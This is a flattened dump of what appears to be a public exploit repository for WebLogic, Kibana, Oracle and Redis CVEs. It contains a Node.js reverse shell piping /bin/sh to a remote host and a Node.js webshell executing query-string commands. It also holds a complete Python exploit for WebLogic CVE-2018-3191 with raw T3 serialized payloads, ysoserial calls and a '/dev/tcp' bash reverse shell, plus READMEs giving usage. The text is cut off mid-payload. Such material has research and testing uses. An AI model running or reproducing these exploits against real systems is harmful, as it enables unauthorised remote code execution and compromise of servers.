├── cve-2018-17246 ├── README.md ├── rshell.js └── webshell.js ├── cve-2018-2894 └── README.md ├── cve-2018-3004 ├── DecodeMe.sql └── README.md ├── cve-2018-3191 ├── README.md ├── cve-2018-3191.py ├── weblogic-spring-jndi-10.3.6.0.jar └── ysoserial-master-ecc60747a5-1.jar ├── cve-2019-2725 ├── README.md ├── cve-2019-2725.py └── payload.xml ├── redis ├── README.md └── redis.py └── weblogic_dser ├── README.md ├── weblogic_dser.py └── ysoserial-cve-2018-3245.jar /cve-2018-17246/README.md: -------------------------------------------------------------------------------- 1 | Write up at https://buffered4ever.com/2019/06/08/kibana-local-file-inclusion-cve-2018-17246/ 2 | -------------------------------------------------------------------------------- /cve-2018-17246/rshell.js: -------------------------------------------------------------------------------- 1 | (function(){ 2 | var net = require("net"), 3 | cp = require("child_process"), 4 | sh = cp.spawn("/bin/sh", []); 5 | var client = new net.Socket(); 6 | client.connect(8000, "172.17.0.1", function(){ 7 | client.pipe(sh.stdin); 8 | sh.stdout.pipe(client); 9 | sh.stderr.pipe(client); 10 | }); 11 | return /a/; // Prevents the Node.js application form crashing 12 | })(); 13 | 14 | -------------------------------------------------------------------------------- /cve-2018-17246/webshell.js: -------------------------------------------------------------------------------- 1 | var sys = require('sys'), 2 | exec = require('child_process').exec, 3 | child, 4 | http = require('http'); 5 | 6 | child = function(res, cmd) { 7 | exec(cmd, 8 | function (error, stdout, stderr) { 9 | res.end(stdout); 10 | if (error !== null) { 11 | console.log('exec error: ' + error); 12 | } 13 | }); 14 | }; 15 | 16 | http.createServer(function (req, res) { 17 | res.writeHead(200, {'Content-Type': 'text/plain'}); 18 | var parsedRequest = require('url').parse(req.url, true); 19 | var cmd = parsedRequest.query['name']; 20 | if (cmd != undefined) 21 | { 22 | console.log("[cmd] " + cmd); 23 | child(res, cmd); 24 | } 25 | }).listen('6660', '0.0.0.0'); 26 | 27 | -------------------------------------------------------------------------------- /cve-2018-2894/README.md: -------------------------------------------------------------------------------- 1 | Write up at https://buffered4ever.com/2019/06/09/cve-2018-2894-weblogic-jsp-file-upload/ 2 | -------------------------------------------------------------------------------- /cve-2018-3004/DecodeMe.sql: -------------------------------------------------------------------------------- 1 | create or replace and compile java source named DecodeMe as 2 | import java.io.*; 3 | import java.beans.*; 4 | public class DecodeMe{ 5 | public static void input(String xml) throws InterruptedException, IOException { 6 | 7 | XMLDecoder decoder = new XMLDecoder ( new ByteArrayInputStream(xml.getBytes())); 8 | Object object = decoder.readObject(); 9 | System.out.println(object.toString()); 10 | decoder.close(); 11 | 12 | } 13 | } 14 | ; 15 | / 16 | 17 | CREATE OR REPLACE PROCEDURE decodeme (p_xml IN VARCHAR2) IS 18 | language java name 'DecodeMe.input(java.lang.String)'; 19 | / 20 | 21 | BEGIN 22 | decodeme(' 23 | 24 |

32 | 33 | '); 34 | END; 35 | / 36 | -------------------------------------------------------------------------------- /cve-2018-3004/README.md: -------------------------------------------------------------------------------- 1 | Write up at https://buffered4ever.com/2019/06/08/cve-2018-3004-oracle-privilege-escalation-via-xml-deserialization/ 2 | -------------------------------------------------------------------------------- /cve-2018-3191/README.md: -------------------------------------------------------------------------------- 1 | weblogic-spring-jndi-12.2.1.3.jar can be downloaded from the following link: 2 | https://github.com/buffered4ever/Exploits/releases/download/1.0/weblogic-spring-jndi-12.2.1.3.jar 3 | 4 | Usage: 5 | 6 | To run arbitrary commands 7 | python cve-2018-3191.py -c '' 8 | 9 | To get a reverse shell 10 | python cve-2018-3191.py -rs 11 | 12 | Incase of SSL, 13 | To run arbitrary commands 14 | python cve-2018-3191.py -c '' -ssl 15 | 16 | To get a reverse shell 17 | python cve-2018-3191.py -rs -ssl 18 | -------------------------------------------------------------------------------- /cve-2018-3191/cve-2018-3191.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # This code exploits the CVE-2018-3191 unauthenticated RCE vulnerability in WebLogic 3 | # 4 | # 5 | # https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html 6 | # https://mp.weixin.qq.com/s/ebKHjpbQcszAy_vPocW0Sg 7 | # https://github.com/pyn3rd/CVE-2018-3191 8 | # The vulnerability affects supported versions: 9 | # 10.3.6.0, 12.2.1.0, 12.1.3.0, 12.2.1.1, 12.2.1.3 10 | #Tested on docker https://hub.docker.com/r/ismaleiva90/weblogic12/ (12.1.3.0) 11 | #Tested on docker https://hub.docker.com/r/zhiqzhao/ubuntu_weblogic1036_domain/ (10.3.6.0) 12 | 13 | # Information for building the exploit was taken from here: https://github.com/voidfyoo/CVE-2018-3191 and https://github.com/pyn3rd/CVE-2018-3191 14 | # The version of ysoserial used in this exploit can be found at https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar 15 | 16 | # Dunstan Pinto, 14/11/2018 (dunstan.pinto@gmail.com) 17 | 18 | import socket 19 | import os 20 | import sys 21 | import struct 22 | import time 23 | import ssl 24 | 25 | def t3_handshake_rs(sock,server_addr): 26 | sock.connect(server_addr) 27 | if len(sys.argv) > 5: 28 | if sys.argv[5] == '-ssl': 29 | sock.send('7433732031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 30 | else: 31 | print "Use -ssl option if weblogic server uses t3s" 32 | exit() 33 | else: 34 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 35 | time.sleep(1) 36 | sock.recv(1024) 37 | print 't3 handshake successful' 38 | 39 | def t3_handshake_run(sock,server_addr): 40 | sock.connect(server_addr) 41 | if len(sys.argv) > 6: 42 | if sys.argv[6] == '-ssl': 43 | sock.send('7433732031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 44 | else: 45 | print "Use -ssl option if weblogic server uses t3s" 46 | exit() 47 | else: 48 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 49 | time.sleep(1) 50 | sock.recv(1024) 51 | print 't3 handshake successful' 52 | 53 | 54 | #function to get a reverse shell 55 | def rs(dip,dport,switch,sip,sslflag=False): 56 | server_addr = (dip, dport) 57 | print "Select the payload" 58 | jpayload = raw_input("1. CommonsCollections1 - commons-collections:3.1\n2. CommonsCollections2 - commons-collections4:4.0\n3. CommonsCollections3 - commons-collections:3.1\n4. CommonsCollections4 - commons-collections4:4.0\n5. CommonsCollections5 - commons-collections:3.1 and works with <=JRE 8u72\n6. CommonsCollections6 - commons-collections:3.1 and works with <=JRE 8u72\n7. Jdk7u21 - <=Jdk7u21\n") 59 | if jpayload == '1': 60 | t3_handshake_rs(sock,server_addr) 61 | print 'Generating ysoserial CommonsCollections1 payload' 62 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip)) 63 | time.sleep(3) 64 | os.system("mate-terminal --command 'nc -lvp 8000'") 65 | 66 | elif jpayload == '2': 67 | t3_handshake_rs(sock,server_addr) 68 | print 'Generating ysoserial CommonsCollections2 payload' 69 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections2 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip)) 70 | time.sleep(3) 71 | os.system("mate-terminal --command 'nc -lvp 8000'") 72 | elif jpayload == '3': 73 | t3_handshake_rs(sock,server_addr) 74 | print 'Generating ysoserial CommonsCollections3 payload' 75 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections3 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip)) 76 | time.sleep(3) 77 | os.system("mate-terminal --command 'nc -lvp 8000'") 78 | elif jpayload == '4': 79 | t3_handshake_rs(sock,server_addr) 80 | print 'Generating ysoserial CommonsCollections4 payload' 81 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip)) 82 | time.sleep(3) 83 | os.system("mate-terminal --command 'nc -lvp 7000'") 84 | elif jpayload == '5': 85 | t3_handshake_rs(sock,server_addr) 86 | print 'Generating ysoserial CommonsCollections5 payload' 87 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip)) 88 | time.sleep(3) 89 | os.system("mate-terminal --command 'nc -lvp 8000'") 90 | elif jpayload == '6': 91 | t3_handshake_rs(sock,server_addr) 92 | print 'Generating ysoserial CommonsCollections6 payload' 93 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip)) 94 | time.sleep(3) 95 | os.system("mate-terminal --command 'nc -lvp 8000'") 96 | elif jpayload == '7': 97 | t3_handshake_rs(sock,server_addr) 98 | print 'Generating ysoserial Jdk7u21 payload' 99 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip)) 100 | time.sleep(3) 101 | os.system("mate-terminal --command 'nc -lvp 8000'") 102 | else: 103 | print "Select one of the 7 payloads" 104 | exit() 105 | 106 | 107 | #function to run arbitrary commands on the server 108 | def run(dip,dport,switch,cmd,sip,sslflag=False): 109 | server_addr = (dip, dport) 110 | print "Select the payload" 111 | jpayload = raw_input("1. CommonsCollections1 - commons-collections:3.1\n2. CommonsCollections2 - commons-collections4:4.0\n3. CommonsCollections3 - commons-collections:3.1\n4. CommonsCollections4 - commons-collections4:4.0\n5. CommonsCollections5 - commons-collections:3.1 and works with <=JRE 8u72\n6. CommonsCollections6 - commons-collections:3.1 and works with <=JRE 8u72\n7. Jdk7u21 - <=Jdk7u21\n") 112 | if jpayload == '1': 113 | t3_handshake_run(sock,server_addr) 114 | print 'Generating ysoserial CommonsCollections1 payload' 115 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 \"{}\"'".format(cmd)) 116 | time.sleep(3) 117 | elif jpayload == '2': 118 | t3_handshake_run(sock,server_addr) 119 | print 'Generating ysoserial CommonsCollections2 payload' 120 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections2 \"{}\"'".format(cmd)) 121 | time.sleep(3) 122 | elif jpayload == '3': 123 | t3_handshake_run(sock,server_addr) 124 | print 'Generating ysoserial CommonsCollections3 payload' 125 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections3 \"{}\"'".format(cmd)) 126 | time.sleep(3) 127 | elif jpayload == '4': 128 | t3_handshake_run(sock,server_addr) 129 | print 'Generating ysoserial CommonsCollections4 payload' 130 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 \"{}\"'".format(cmd)) 131 | time.sleep(3) 132 | elif jpayload == '5': 133 | t3_handshake_run(sock,server_addr) 134 | print 'Generating ysoserial CommonsCollections5 payload' 135 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 \"{}\"'".format(cmd)) 136 | time.sleep(3) 137 | elif jpayload == '6': 138 | t3_handshake_run(sock,server_addr) 139 | print 'Generating ysoserial CommonsCollections6 payload' 140 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 \"{}\"'".format(cmd)) 141 | time.sleep(3) 142 | elif jpayload == '7': 143 | t3_handshake_run(sock,server_addr) 144 | print 'Generating ysoserial Jdk7u21 payload' 145 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"{}\"'".format(cmd)) 146 | time.sleep(3) 147 | else: 148 | print "Select one of the 7 payloads" 149 | exit() 150 | 151 | def general_usage(): 152 | print "Use the -c switch to execute an arbitrary command on the weblogic server, for e.g.: python cve-2018-3191.py -c '' " 153 | print "Use the -rs switch to get a reverse shell, for e.g.: python cve-2018-3191.py -rs " 154 | print "Incase of SSL:" 155 | print "Use the -c switch to execute an arbitrary command on the weblogic server and -ssl switch to connect using t3s, for e.g.: python cve-2018-3191.py -c '' -ssl" 156 | print "Use the -rs switch to get a reverse shell and -ssl switch to connect using t3s, for e.g.: python cve-2018-3191.py -rs -ssl" 157 | 158 | 159 | if __name__=="__main__": 160 | try: 161 | dip = sys.argv[1] 162 | dport = int(sys.argv[2]) 163 | switch = sys.argv[3] 164 | 165 | if switch == '-rs': 166 | try: 167 | sip = sys.argv[4] 168 | if len(sys.argv) > 5: 169 | if sys.argv[5] == '-ssl': 170 | sslflag = True 171 | print "[+] ssl mode enabled" 172 | sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) 173 | sock.settimeout(20) 174 | rs(dip,dport,switch,sip,sslflag) 175 | else: 176 | print "Use -ssl option if weblogic server uses t3s" 177 | exit() 178 | 179 | else: 180 | print "[+] ssl mode disabled" 181 | sslflag = False 182 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 183 | rs(dip,dport,switch,sip) 184 | sock.settimeout(20) 185 | print 'Exploiting CVE-2018-3191 to get a reverse shell' 186 | print "Based on your weblogic server version, select any one of the payloads" 187 | jndipayload = raw_input("1. 10.3.6.0.jar - for versions 10.3.6.0, 12.2.1.0, 12.1.3.0 and 12.2.1.1\n2. 12.2.1.3.jar - for version 12.2.1.3\n") 188 | if jndipayload == '1': 189 | payloadObj = os.popen(("java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://{0}:1099/Object").format(sip)).read() 190 | elif jndipayload == '2': 191 | payloadObj = os.popen(("java -jar weblogic-spring-jndi-12.2.1.3.jar rmi://{0}:1099/Object").format(sip)).read() 192 | else: 193 | print "Select one of the 2 payloads" 194 | exit() 195 | payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' 196 | payload=payload+payloadObj 197 | payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' 198 | # adjust header for appropriate message length 199 | payload=struct.pack('>I',len(payload)) + payload[4:] 200 | print '[+] Payload sent!' 201 | try: 202 | sock.send(payload) 203 | data = sock.recv(1024) 204 | except: 205 | sock.close() 206 | except IndexError: 207 | print "Usage: python cve-2018-3191.py -rs " 208 | print "For SSL: python cve-2018-3191.py -rs -ssl" 209 | 210 | if switch == '-c': 211 | try: 212 | cmd = sys.argv[4] 213 | sip = sys.argv[5] 214 | if len(sys.argv) > 6: 215 | if sys.argv[6] == '-ssl': 216 | sslflag = True 217 | print "[+] ssl mode enabled" 218 | sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) 219 | sock.settimeout(20) 220 | run(dip,dport,switch,cmd,sip,sslflag) 221 | else: 222 | print "Use -ssl option if weblogic server uses t3s" 223 | exit() 224 | else: 225 | print "[+] ssl mode disabled" 226 | sslflag = False 227 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 228 | run(dip,dport,switch,cmd,sip) 229 | sock.settimeout(20) 230 | print "Exploiting CVE-2018-3191 to get run the command '{}'".format(cmd) 231 | print "Based on your weblogic server version, select any one of the payloads" 232 | jndipayload = raw_input("1. 10.3.6.0.jar - for versions 10.3.6.0, 12.2.1.0, 12.1.3.0 and 12.2.1.1\n2. 12.2.1.3.jar - for version 12.2.1.3\n") 233 | if jndipayload == '1': 234 | payloadObj = os.popen(("java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://{0}:1099/Object").format(sip)).read() 235 | elif jndipayload == '2': 236 | payloadObj = os.popen(("java -jar weblogic-spring-jndi-12.2.1.3.jar rmi://{0}:1099/Object").format(sip)).read() 237 | else: 238 | print "Select one of the 2 payloads" 239 | exit() 240 | payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' 241 | payload=payload+payloadObj 242 | payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e